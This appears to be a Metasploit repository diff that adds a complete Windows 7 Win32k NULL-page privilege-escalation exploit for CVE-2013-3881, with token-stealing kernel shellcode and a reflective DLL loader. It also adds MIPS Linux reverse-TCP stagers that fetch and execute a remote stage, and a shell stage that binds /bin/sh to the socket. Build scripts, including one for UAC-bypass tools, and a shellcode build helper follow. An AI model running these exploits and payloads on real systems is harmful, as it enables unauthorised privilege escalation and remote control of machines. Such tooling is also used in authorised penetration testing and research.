# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store
external/source/exploits/cve-2013-3881/cve-2013-3881.sln
Vendored Executable
+20
View File
@@ -0,0 +1,20 @@

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2013-3881", "cve-2013-3881\cve-2013-3881.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.c
Vendored Executable
+261
View File
@@ -0,0 +1,261 @@
/*
* Exploit Title: CVE-2013-3881 Win32k NULL Page Vulnerability
* Date: February 5, 2014
* Vulnerability Discovery: Seth Gibson and Dan Zentner of Endgame
* Exploit Author: Spencer McIntyre
* Version: Windows 7 SP0/SP1
* Tested on: Windows 7 SP0/SP1
* CVE-2013-3881 MS13-081
* References:
* http://endgame.com/news/microsoft-win32k-null-page-vulnerability-technical-analysis.html
* http://immunityproducts.blogspot.com/2013/11/exploiting-cve-2013-3881-win32k-null.html
* http://picturoku.blogspot.com/2011/12/bit-away-from-kernel-execution.html
*/
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
// Purloined from ntstatus.h
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
#define WIN32_NO_STATUS
#include <windows.h>
#undef WIN32_NO_STATUS
#ifndef _NTDEF_
typedef __success(return >= 0) LONG NTSTATUS;
typedef NTSTATUS *PNTSTATUS;
#endif
#define TABLE_BASE 0xff910000
static const char* window_class_name = "PWN_CLASS";
static HWND window0 = NULL;
static HWND window1 = NULL;
static HDESK desktop = NULL;
const unsigned char shellcode[] =
"\x33\xc0" // xor eax, eax
"\x64\x8b\x80\x24\x01\x00\x00" // mov eax, fs:[eax+0x124]
"\x8b\x40\x50" // mov eax, ds:[eax+0x50]
"\x8b\xc8" // mov ecx, eax
/* LOOPTHROUGHPROCESSES */
"\x8b\x80\xb8\x00\x00\x00" // mov eax, ds:[eax+0xb8]
"\x2d\xb8\x00\x00\x00" // sub eax, 0xb8
"\x83\xb8\xb4\x00\x00\x00\x04" // cmp DWORD PTR ds:[eax+0xb4], 4
"\x75\xec" // jnz short LOOPTHROUGHPROCESSES
"\x8b\x90\xf8\x00\x00\x00" // mov edx, ds:[eax+0x0f8]
"\x89\x91\xf8\x00\x00\x00" // mov [ecx+0x0f8], edx
/* Epilog Part 1: Uncorrupt HANDLEENTRY */
"\xbe\x00\x08\x00\x00" // mov esi, 0x0800
"\x8b\x3e" // mov edi, [esi]
"\x8b\x46\x04" // mov eax, [esi+4]
"\x89\x07" // mov [edi], eax
"\x8b\x46\x08" // mov eax, [esi+8]
"\x89\x47\x04" // mov [edi + 4], eax
"\x8b\x46\x0c" // mov eax, [esi+c]
"\x89\x47\x08" // mov [edi+8], eax
/* Epilog Part 2: Return to xxxTrackPopupMenuEx */
"\x83\x7c\x24\x58\x00" // cmp DWORD PTR [esp+0x58], 0
"\x74\x11" // je short sp1
"\x83\x7c\x24\x5c\x01" // cmp DWORD PTR [esp+0x5c], 1
"\x75\x0a" // je short sp1
/* Service Pack 0 */
"\x83\xc4\x48" // add esp, 0x48
"\x5f" // pop edi
"\x5e" // pop esi
"\x5b" // pop ebx
"\x5d" // pop ebp
"\xc2\x04\x00" // ret 4
/* Service Pack 1 */
"\x83\xc4\x4c" // add esp 0x4c
"\x5f" // pop edi
"\x5e" // pop esi
"\x83\xc4\x0c" // add esp, 0x0c
"\x5d" // pop ebp
"\xc2\x08\x00"; // ret 8
typedef struct _HANDLEENTRY {
struct _HEAD *pHead;
void *pOwner;
UINT8 bType;
UINT8 bFlags;
UINT16 wUniq;
} HANDLEENTRY, *PHANDLEENTRY;
typedef NTSTATUS (NTAPI *lNtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN PVOID *BaseAddress,
IN PULONG ZeroBits,
IN PSIZE_T RegionSize,
IN ULONG AllocationType,
IN ULONG Protect
);
typedef NTSTATUS (NTAPI *lNtQueryIntervalProfile)(
IN DWORD ProfileSource,
OUT PULONG Interval
);
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
return DefWindowProc(hwnd, msg, wParam, lParam);
}
NTSTATUS AllocateNullPage(void) {
HMODULE hNtdll = NULL;
FARPROC pNtAllocateVirtualMemory = NULL;
DWORD base_address = 1;
SIZE_T region_size = 0x1000;
ULONG zero_bits = 0;
HANDLE current_process = NULL;
NTSTATUS status = 0;
hNtdll = LoadLibraryA("ntdll");
pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
current_process = GetCurrentProcess();
status = pNtAllocateVirtualMemory(current_process, &base_address, 0, &region_size, (MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN), PAGE_EXECUTE_READWRITE);
FreeLibrary(hNtdll);
return status;
}
PHANDLEENTRY GetAheList(void) {
HMODULE hUser32 = NULL;
HANDLEENTRY **tagSharedInfo = NULL;
hUser32 = LoadLibraryA("user32");
tagSharedInfo = (PHANDLEENTRY *)GetProcAddress(hUser32, "gSharedInfo");
if (tagSharedInfo == NULL) {
return NULL;
}
return (PHANDLEENTRY)*&tagSharedInfo[1];
}
DWORD WINAPI TriggerThread0(void *garbage) {
HMENU menu0;
SetThreadDesktop(desktop);
window0 = CreateWindow(window_class_name, "Window 0", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 240, 120, NULL, NULL, NULL, NULL);
menu0 = CreatePopupMenu();
if (AppendMenu(menu0, (MF_STRING | MF_ENABLED), 32001, "test") == 0) {
return 0;
}
TrackPopupMenu(menu0, TPM_CENTERALIGN, 0, 0, 0, window0, NULL);
return 0;
}
BOOL WINAPI CreateAndRegisterClass(char * class_name) {
WNDCLASSEX wx;
HINSTANCE hInstance = NULL;
hInstance = (HINSTANCE)GetModuleHandle(NULL);
if (hInstance == NULL) {
return FALSE;
}
wx.cbSize = sizeof(WNDCLASSEX);
wx.style = 0;
wx.lpfnWndProc = WndProc;
wx.cbClsExtra = 0;
wx.cbWndExtra = 0;
wx.hInstance = hInstance;
wx.hIcon = LoadIcon(NULL, IDI_APPLICATION);
wx.hCursor = LoadCursor(NULL, IDC_ARROW);
wx.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wx.lpszMenuName = NULL;
wx.lpszClassName = class_name;
wx.hIconSm = LoadIcon(NULL, IDI_APPLICATION);
if (RegisterClassEx(&wx) != 0) {
return TRUE;
}
return FALSE;
}
DWORD WINAPI ExecutePayload(LPVOID lpPayload) {
VOID(*lpCode)() = (VOID(*)())lpPayload;
lpCode();
return ERROR_SUCCESS;
}
void Win32kNullPage(LPVOID lpPayload) {
HMENU menu1 = NULL;
HMENU menu2 = NULL;
HANDLE gdi_handle = NULL;
void *promise_land = NULL;
ULONG interval = 0;
PHANDLEENTRY aheList = NULL;
PHANDLEENTRY target_handle = NULL;
DWORD saved_bytes = 0;
desktop = CreateDesktop("DontPanic", NULL, NULL, 0, GENERIC_ALL, NULL);
SetThreadDesktop(desktop);
if (!CreateAndRegisterClass(window_class_name)) {
return;
}
if (AllocateNullPage() != STATUS_SUCCESS) {
return;
}
*((PDWORD)promise_land + 0) = 0x000004eb; /* jmp 4 */
*((PDWORD)promise_land + 1) = 0x90909090; /* noooop */
*((PDWORD)promise_land + 2) = 0x000400b8; /* mov eax, 400 */
*((PDWORD)promise_land + 3) = 0x90d0ff00; /* call eax */
*((PDWORD)promise_land + 7) = 0x00;
*((PDWORD)promise_land + 9) = 0x00;
*((PDWORD)promise_land + 12) = 0x00;
*(PDWORD)((PBYTE)promise_land + 0x04eb + 0x04) = (0x0200 - 4);
*(PDWORD)((PBYTE)promise_land + 0x04eb + 0x08) = (0x0200 - 4);
memcpy((PDWORD)promise_land + 256, shellcode, sizeof(shellcode));
window1 = CreateWindow(window_class_name, "Window 1", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 240, 120, NULL, NULL, NULL, NULL);
menu1 = CreatePopupMenu();
menu2 = CreateMenu();
SetMenu(window1, menu2);
DestroyMenu(menu2);
aheList = GetAheList();
*((PDWORD)promise_land + 127) = ((DWORD)menu2 & 0xffff);
*((PDWORD)promise_land + 128) = 0x01;
*((PDWORD)promise_land + 129) = ((((DWORD)menu2 & 0xffff) * 12) + TABLE_BASE + 5) - 0x0104;
target_handle = &aheList[((DWORD)menu2 & 0xffff)];
*((PDWORD)promise_land + 512) = ((((DWORD)menu2 & 0xffff) * 12) + TABLE_BASE);
memcpy((PDWORD)promise_land + 513, target_handle, sizeof(HANDLEENTRY));
if (AppendMenu(menu1, (MF_STRING | MF_ENABLED), 32001, "test") == 0) {
return;
}
do {
gdi_handle = CreateMetaFile(NULL);
} while (gdi_handle != NULL);
CreateThread(NULL, 0, TriggerThread0, NULL, 0, 0);
Sleep(500);
TrackPopupMenu(menu1, TPM_CENTERALIGN, 0, 0, 0, window1, NULL);
CreateThread(0, 0, ExecutePayload, lpPayload, 0, NULL);
return;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
BOOL bReturnValue = TRUE;
switch (dwReason) {
case DLL_QUERY_HMODULE:
hAppInstance = hinstDLL;
if (lpReserved != NULL) {
*(HMODULE *)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
Win32kNullPage(lpReserved);
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
};
external/source/exploits/cve-2013-3881/cve-2013-3881/cve-2013-3881.vcxproj
Vendored Executable
+85
View File
@@ -0,0 +1,85 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}</ProjectGuid>
<RootNamespace>cve20133881</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<CompileAs>Default</CompileAs>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<GenerateDebugInformation>false</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="cve-2013-3881.c" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
external/source/exploits/cve-2013-3881/make.msbuild
Vendored
+17
View File
@@ -0,0 +1,17 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\cve-2013-3881.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86" />
<Target Name="x86">
<Message Text="Building CVE-2013-3881 win32k_null_page x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="CVE-2013-3881 is not supported in x64" />
</Target>
</Project>
external/source/exploits/make.bat
Vendored
+21
View File
@@ -40,6 +40,27 @@ IF "%ERRORLEVEL%"=="0" (
POPD
)
IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2013-3881 (win32k_null_page)"
PUSHD CVE-2013-3881
msbuild.exe make.msbuild /target:%PLAT%
POPD
)
IF "%ERRORLEVEL%"=="0" (
ECHO "Building bypassuac (on-disk)"
PUSHD bypassuac
msbuild.exe make.msbuild /target:%PLAT%
POPD
)
IF "%ERRORLEVEL%"=="0" (
ECHO "Building bypassuac (in-memory)"
PUSHD bypassuac_injection
msbuild.exe make.msbuild /target:%PLAT%
POPD
)
FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
echo Finished %ldt%
external/source/shellcode/linux/mips/stage_tcp_shell.s
Vendored
+75
View File
@@ -0,0 +1,75 @@
##
#
# Name: stage_tcp_shell
# Type: Stage
# Qualities: Compatible with both mips little and big endian
# Platforms: Linux
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
# License:
#
# This file is part of the Metasploit Exploit Framework
# and is subject to the same licenses and copyrights as
# the rest of this package.
#
# Description:
#
# This payload duplicates stdio, stdin and stderr to a file descriptor,
# stored on $s2, and executes /bin/sh.
#
# Assemble and create a relocatable object with:
# as -o stage_tcp_shell.o stage_tcp_shell.s
#
# Assemble, link and create an executable ELF with:
# gcc -o stage_tcp_shell stage_tcp_shell.s
#
# The tool "tools/metasm_shell.rb" can be used to easily
# generate the string to place on:
# modules/payloads/stages/linux/mipsle/shell.rb
# and:
# modules/payloads/stages/linux/mipsbe/shell.rb
##
.text
.align 2
.globl main
.set nomips16
main:
.set noreorder
.set nomacro
# dup2(sockfd, 2)
# dup2(sockfd, 1)
# dup2(sockfd, 0)
# a0: oldfd (sockfd)
# a1: newfd (2, 1, 0)
# v0: syscall = __NR_dup2 (4063)
li $s1, -3
nor $s1, $s1, $zero
add $a0, $s2, $zero
dup2_loop:
add $a1, $s1, $zero # dup2_loop
li $v0, 4063 # sys_dup2
syscall 0x40404
li $s0, -1
addi $s1, $s1, -1
bne $s1, $s0, dup2_loop # <dup2_loop>
# execve("/bin/sh", ["/bin/sh"], NULL)
# a0: filename "/bin/sh"
# a1: argv ["/bin/sh", NULL]
# a2: envp NULL
# v0: syscall = __NR_dup2 (4011)
li $t8, -1 # load t8 with -1
getaddr: # getaddr trick from scut@team-teso.net
bltzal $t8, getaddr # branch with $ra stored if t8 < 0
slti $t8, $zero, -1 # delay slot instr: $t8 = 0 (see below)
addi $a0, $ra, 28 # $ra gets this address
sw $a0, -8($sp)
sw $zero, -4($sp)
addi $a1, $sp, -8
slti $a2, $zero,-1
li $v0, 4011 # sys_execve
syscall 0x40404
.string "/bin/sh"
.set macro
.set reorder
external/source/shellcode/linux/mipsbe/stager_sock_reverse.s
Vendored
+127
View File
@@ -0,0 +1,127 @@
##
#
# Name: stager_sock_reverse
# Type: Stager
# Qualities: No Nulls out of the IP / Port data
# Platforms: Linux MIPS Big Endian
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
# License:
#
# This file is part of the Metasploit Exploit Framework
# and is subject to the same licenses and copyrights as
# the rest of this package.
#
# Description:
#
# Implementation of a MIPS BE Linux reverse TCP stager.
#
# File descriptor in $s2.
#
# Assemble and create a relocatable object with:
# as -o stager_sock_reverse.o stager_sock_reverse.s
#
# Assemble, link and create an executable ELF with:
# gcc -o stager_sock_reverse stager_sock_reverse.s
#
# The tool "tools/metasm_shell.rb" can be used to easily
# generate the string to place on:
# modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
##
.text
.align 2
.globl main
.set nomips16
main:
.set noreorder
.set nomacro
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
# a0: domain = PF_INET (2)
# a1: type = SOCK_STREAM (2)
# a2: protocol = IPPROTO_IP (0)
# v0: syscall = __NR_socket (4183)
li $t7, -6
nor $t7, $t7, $zero
addi $a0, $t7, -3
addi $a1, $t7, -3
slti $a2, $zero, -1
li $v0, 4183
syscall 0x40404
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
# a0: sockfd
# a1: addr = AF_INET (2)
# a2: addrlen = 16
# v0: syscall = __NR_connect (4170)
lw $a0, -4($sp)
li $t7, -3
nor $t7, $t7, $zero
sw $t7, -32($sp)
lui $t6, 0x115c
sw $t6, -28($sp)
lui $t6, 0x7f00 # ip
ori $t6, $t6, 0x0001 # ip
sw $t6, -26($sp)
addiu $a1, $sp, -30
li $t4, -17
nor $a2, $t4, $zero
li $v0, 4170
syscall 0x40404
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
# a0: addr = -1
# a1: lenght = 4096
# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
# sp(16): fd = -1
# sp(20): offset = 0
# v0: syscall = __NR_mmap (4090)
li $a0, -1
li $a1, 4097
addi $a1, $a1, -1
li $t1, -8
nor $t1, $t1, $0
add $a2, $t1, $0
li $a3, 2050
li $t3, -22
nor $t3, $t3, $zero
add $t3, $sp, $t3
sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
li $v0, 4090
syscall 0x40404
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
# read(sockfd, addr, 4096)
# a0: sockfd
# a1: addr
# a2: len = 4096
# v0: syscall = __NR_read (4003)
lw $a0, -4($sp)
lw $a1, -8($sp)
li $a2, 4097
addi $a2, $a2, -1
li $v0, 4003
syscall 0x40404
# cacheflush(addr, nbytes, DCACHE)
# a0: addr
# a1: nbytes
# a2: cache = DCACHE (2)
# v0: syscall = __NR_read (4147)
lw $a0, -8($sp)
add $a1, $v0, $zero
li $t1, -3
nor $t1, $t1, $0
add $a2, $t1, $0
li $v0, 4147
syscall 0x40404
# jmp to the stage
lw $s1, -8($sp)
lw $s2, -4($sp)
jalr $s1
.set macro
.set reorder
external/source/shellcode/linux/mipsle/stager_sock_reverse.s
Vendored
+127
View File
@@ -0,0 +1,127 @@
##
#
# Name: stager_sock_reverse
# Type: Stager
# Qualities: No Nulls out of the IP / Port data
# Platforms: Linux MIPS Little Endian
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
# License:
#
# This file is part of the Metasploit Exploit Framework
# and is subject to the same licenses and copyrights as
# the rest of this package.
#
# Description:
#
# Implementation of a MIPS LE Linux reverse TCP stager.
#
# File descriptor in $s2.
#
# Assemble and create a relocatable object with:
# as -o stager_sock_reverse.o stager_sock_reverse.s
#
# Assemble, link and create an executable ELF with:
# gcc -o stager_sock_reverse stager_sock_reverse.s
#
# The tool "tools/metasm_shell.rb" can be used to easily
# generate the string to place on:
# modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
##
.text
.align 2
.globl main
.set nomips16
main:
.set noreorder
.set nomacro
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
# a0: domain = PF_INET (2)
# a1: type = SOCK_STREAM (2)
# a2: protocol = IPPROTO_IP (0)
# v0: syscall = __NR_socket (4183)
li $t7, -6
nor $t7, $t7, $zero
addi $a0, $t7, -3
addi $a1, $t7, -3
slti $a2, $zero, -1
li $v0, 4183
syscall 0x40404
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
# a0: sockfd
# a1: addr = AF_INET (2)
# a2: addrlen = 16
# v0: syscall = __NR_connect (4170)
lw $a0, -4($sp)
li $t7, -3
nor $t7, $t7, $zero
sw $t7, -30($sp)
ori $t6, $zero, 0x5c11 # port
sw $t6, -28($sp)
lui $t6, 0x100 # ip
ori $t6, $t6, 0x7f # ip
sw $t6, -26($sp)
addiu $a1, $sp, -30
li $t4, -17
nor $a2, $t4, $zero
li $v0, 4170
syscall 0x40404
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
# a0: addr = -1
# a1: lenght = 4096
# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
# sp(16): fd = -1
# sp(20): offset = 0
# v0: syscall = __NR_mmap (4090)
li $a0, -1
li $a1, 4097
addi $a1, $a1, -1
li $t1, -8
nor $t1, $t1, $0
add $a2, $t1, $0
li $a3, 2050
li $t3, -22
nor $t3, $t3, $zero
add $t3, $sp, $t3
sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
li $v0, 4090
syscall 0x40404
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
# read(sockfd, addr, 4096)
# a0: sockfd
# a1: addr
# a2: len = 4096
# v0: syscall = __NR_read (4003)
lw $a0, -4($sp)
lw $a1, -8($sp)
li $a2, 4097
addi $a2, $a2, -1
li $v0, 4003
syscall 0x40404
# cacheflush(addr, nbytes, DCACHE)
# a0: addr
# a1: nbytes
# a2: cache = DCACHE (2)
# v0: syscall = __NR_read (4147)
lw $a0, -8($sp)
add $a1, $v0, $zero
li $t1, -3
nor $t1, $t1, $0
add $a2, $t1, $0
li $v0, 4147
syscall 0x40404
# jmp to the stage
lw $s1, -8($sp)
lw $s2, -4($sp) # sockfd saved on $s2
jalr $s1
.set macro
.set reorder
external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm
Vendored
+1 -1
View File
@@ -1,6 +1,6 @@
; Title: Windows Bind Stager (NX, IPv6)
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
; Author: Rapid7 LLC
; Author: Rapid7, Inc
[BITS 32]
external/source/shellcode/windows/stager_reverse_ipv6_tcp_nx.asm
Vendored
+1 -1
View File
@@ -1,6 +1,6 @@
; Title: Windows Reverse Connect Stager (NX, IPv6)
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003, Windows Vista
; Author: Rapid7 LLC
; Author: Rapid7, Inc
[BITS 32]
external/source/shellcode/windows/x86/build.py
Vendored
+125 -121
View File
@@ -1,124 +1,128 @@
#=============================================================================#
# A simple python build script to build the singles/stages/stagers and
# some usefull information such as offsets and a hex dump. The binary output
# will be placed in the bin directory. A hex string and usefull comments will
# be printed to screen.
#
# Example:
# >python build.py stager_reverse_tcp_nx
#
# Example, to build everything:
# >python build.py all > build_output.txt
#
# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
#=============================================================================#
import os, sys, time
from subprocess import Popen
from struct import pack
#=============================================================================#
def clean( dir="./bin/" ):
for root, dirs, files in os.walk( dir ):
for name in files:
os.remove( os.path.join( root, name ) )
#=============================================================================#
def locate( src_file, dir="./src/" ):
for root, dirs, files in os.walk( dir ):
for name in files:
if src_file == name:
return root
return None
#=============================================================================#
def build( name ):
location = locate( "%s.asm" % name )
if location:
input = os.path.normpath( os.path.join( location, name ) )
output = os.path.normpath( os.path.join( "./bin/", name ) )
p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )
p.wait()
xmit( name )
else:
print "[-] Unable to locate '%s.asm' in the src directory" % name
#=============================================================================#
def xmit_dump_ruby( data, length=16 ):
dump = ""
for i in xrange( 0, len( data ), length ):
bytes = data[ i : i+length ]
hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) )
if i+length <= len(data):
hex += " +"
dump += "%s\n" % ( hex )
print dump
#=============================================================================#
def xmit_offset( data, name, value ):
offset = data.find( value );
if offset != -1:
print "# %s Offset: %d" % ( name, offset )
#=============================================================================#
def xmit( name, dump_ruby=True ):
bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) )
f = open( bin, 'rb')
data = f.read()
print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
xmit_offset( data, "Port", pack( ">H", 4444 ) ) # 4444
xmit_offset( data, "LEPort", pack( "<H", 4444 ) ) # 4444
xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) ) # 127.0.0.1
xmit_offset( data, "IPv6Host", pack( "<Q", 0xBBBBBBBBBBBBBBB1 ) ) # An IPv6 Address
xmit_offset( data, "IPv6ScopeId", pack( "<L", 0xAAAAAAA1 ) ) # An IPv6 Scope ID
xmit_offset( data, "HostName", "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\x00" ) # hostname filler
xmit_offset( data, "RetryCounter", "\x6a\x05" ) # socket retry
xmit_offset( data, "CodeLen", pack( "<L", 0x12345678 ) ) # Filler
xmit_offset( data, "Hostname", "https" )
xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
xmit_offset( data, "ExitFunk", pack( "<L", 0xE035F044 ) ) # kernel32.dll!Sleep
xmit_offset( data, "EggTag1", pack( "<L", 0xDEADDEAD ) ) # Egg tag 1
xmit_offset( data, "EggTag2", pack( "<L", 0xC0DEC0DE ) ) # Egg tag 2
xmit_offset( data, "EggTagSize", pack( ">H", 0x1122 ) ) # Egg tag size
xmit_offset( data, "RC4Key", "RC4KeyMetasploit") # RC4 key
xmit_offset( data, "XORKey", "XORK") # XOR key
if( name.find( "egghunter" ) >= 0 ):
null_count = data.count( "\x00" )
if( null_count > 0 ):
print "# Note: %d NULL bytes found." % ( null_count )
if dump_ruby:
xmit_dump_ruby( data )
#=============================================================================#
def main( argv=None ):
if not argv:
argv = sys.argv
try:
if len( argv ) == 1:
